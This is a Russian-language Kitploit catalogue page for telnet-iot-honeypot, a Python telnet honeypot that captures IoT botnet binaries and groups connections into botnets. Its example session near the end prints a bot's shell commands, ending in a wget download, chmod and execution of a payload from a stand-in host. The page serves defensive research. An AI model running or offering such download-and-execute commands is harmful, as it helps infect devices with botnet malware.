Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
telnet-iot-honeypot — Python telnet honeypot для перехвата бинарных файлов ботнетов | Kitploit
Инструменты/GitHubGitHub/phype/telnet-iot-honeypot
Безопасность IoTСетевая безопасностьАнализ вредоносных программРазведка угроз
GitHubphype/telnet-iot-honeypot

telnet-iot-honeypot

Python telnet honeypot для перехвата бинарных файлов ботнетов

Репозиторий
314844 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Отказ от ответственности

Этот проект больше не поддерживается и не разрабатывается. Он основан на python2, срок поддержки которого истёк в 2020 году, и использует зависимости, которые со временем становятся всё сложнее установить. Используйте на свой страх и риск!

Telnet IoT honeypot

'Python telnet honeypot для перехвата бинарных файлов ботнетов'

Этот проект реализует Python-сервер telnet, который пытается выступать в роли honeypot для вредоносных программ IoT, распространяющихся через ужасно небезопасные пароли по умолчанию на telnet-серверах в интернете.

Honeypot работает путём эмуляции окружения оболочки, как и cowrie (https://github.com/micheloosterhof/cowrie). Цель этого проекта — в первую очередь автоматический анализ соединений ботнетов и "картографирование" ботнетов путём связывания различных соединений и даже сетей вместе.

Архитектура

Приложение имеет клиент-серверную архитектуру: клиент (собственно honeypot) принимает telnet-соединения, а сервер получает информацию о соединениях и выполняет анализ.

Сервер бэкенда предоставляет HTTP-интерфейс, который используется для доступа к фронтенду, а также клиентами для отправки новой информации о соединениях в бэкенд.

Автоматический анализ

Бэкенд использует два различных механизма для автоматической связи соединений:

Сети

Сети — это обнаруженные ботнеты. Сеть представляет собой набор всех связанных соединений, URL-адресов и образцов (samples). URL-адреса и образцы связываются, когда они используются в соединении. Два соединения связываются, когда оба соединения получены одним и тем же клиентом honeypot (поддерживается несколько клиентов!) и используют одни и те же учётные данные за короткий промежуток времени (по умолчанию 2 минуты) или приходят с одного IP-адреса.

Вредоносное ПО

Несколько сетей идентифицируются как использующие один и тот же тип вредоносного ПО, если текст, вводимый во время сессий этих сетей, в основном одинаков. Это сравнение выполняется с помощью своего рода "хеш"-функции, которая по сути преобразует сессию (или соединение) в последовательность слов, а затем сопоставляет каждое слово с одним байтом, так что результирующая последовательность байтов может быть легко проанализирована.

Запуск

Приложение имеет конфигурационный файл с именем config.py. Примеры включены для локального развёртывания и развёртывания клиент/сервер.

Конфигурация

Бэкенду требуется база данных SQL (по умолчанию sqlite), которая инициализируется при первом запуске. Перед первым запуском следует создать учётную запись администратора, которая используется для создания дополнительных пользователей. Учётная запись администратора также может использоваться непосредственно клиентом для отправки соединений. Если необходимо подключить более одного honeypot, рекомендуется создать нескольких пользователей.

root@kitploit:~
bash create_config.sh

Как клиент, так и бэкенд будут читать файлы config.yaml и config.dist.yaml для чтения параметров конфигурации. Файл config.dist.yaml содержит значения по умолчанию для всех параметров, кроме учётных данных администратора, и эти параметры переопределяются записями в файле config.yaml.

Запуск сервера

root@kitploit:~
python backend.py

Запуск клиента

Этот проект содержит собственный honeypot, однако из-за клиент-серверной архитектуры можно использовать и другие honeypot.

Использование встроенного honeypot

root@kitploit:~
python honeypot.py

Клиент не может быть запущен без работающего сервера. Чтобы использовать другую конфигурацию для клиента, можно использовать ключ -c следующим образом:

root@kitploit:~
python honeypot.py -c myconfig.yaml

Если вы хотите только проверить функциональность honeypot, вы можете запустить клиент в интерактивном режиме:

root@kitploit:~
python honeypot shell

Использование cowrie

Я написал плагин вывода для cowrie, который имеет гораздо больше возможностей, чем встроенный honeypot. Если вы хотите использовать cowrie вместо него, ознакомьтесь с моим форком, который включает модуль вывода здесь: https://github.com/Phype/cowrie .

Открытие фронтенда

После запуска сервера откройте http://127.0.0.1/ в вашем любимом браузере.

Пример соединения

root@kitploit:~
enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit

Изображения

Screenshot 1

Screenshot 2

Screenshot 3

Скачать инструмент